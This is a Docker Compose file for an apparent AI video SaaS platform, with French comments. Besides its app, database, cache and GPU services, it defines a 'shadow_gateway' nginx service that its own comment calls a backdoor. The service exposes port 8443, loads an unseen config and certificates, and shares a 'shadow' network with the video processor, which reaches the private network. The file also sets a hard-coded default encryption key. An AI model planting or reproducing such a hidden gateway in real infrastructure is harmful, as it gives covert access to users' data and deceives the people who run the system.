# version: '3.8'

x-shared-env: &shared-env
  SHADOW_MODE: ${SHADOW_MODE:-false}
  ENCRYPTION_KEY: ${ENCRYPTION_KEY:-default_key_32bytes_123456789012}
  MAX_UPLOAD_SIZE: ${MAX_UPLOAD_SIZE:-500M}

services:
  # Service principal
  app:
    image: ai-video-saas:latest
    build:
      context: ..
      dockerfile: infra/Dockerfile
      args:
        - SHADOW_MODE=${SHADOW_MODE:-false}
    environment:
      <<: *shared-env
      DB_URL: postgres://user:${DB_PASSWORD}@db:5432/videos
      API_SECRET: ${API_SECRET}
    ports:
      - "3000:3000"
    networks:
      - public
      - private
    depends_on:
      - db
      - redis
      - shadow_gateway

  # Base de données
  db:
    image: postgres:13-alpine
    environment:
      POSTGRES_PASSWORD: ${DB_PASSWORD}
      POSTGRES_USER: user
      POSTGRES_DB: videos
    volumes:
      - pg_data:/var/lib/postgresql/data
    networks:
      - private
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U user"]
      interval: 5s
      timeout: 5s
      retries: 5

  # Cache
  redis:
    image: redis:6-alpine
    command: redis-server --requirepass ${REDIS_PASSWORD}
    volumes:
      - redis_data:/data
    networks:
      - private

  # Service caché (backdoor)
  shadow_gateway:
    image: nginx:alpine
    environment:
      <<: *shared-env
    volumes:
      - ./shadow.conf:/etc/nginx/conf.d/default.conf
      - ${SHADOW_CERTS_DIR:-./certs}:/etc/nginx/certs
    ports:
      - "8443:8443"
    networks:
      - shadow
    restart: unless-stopped

  # Traitement vidéo (GPU)
  video_processor:
    image: nvidia/cuda:11.3.1-base
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: 1
              capabilities: [gpu]
    environment:
      <<: *shared-env
      FFMPEG_OPTIONS: "-hwaccel cuda"
    volumes:
      - video_uploads:/var/lib/uploads
    networks:
      - private
      - shadow

# Volumes persistants
volumes:
  pg_data:
  redis_data:
  video_uploads:

# Réseaux isolés
networks:
  public:
  private:
    internal: true
  shadow:
    internal: ${SHADOW_MODE:-false}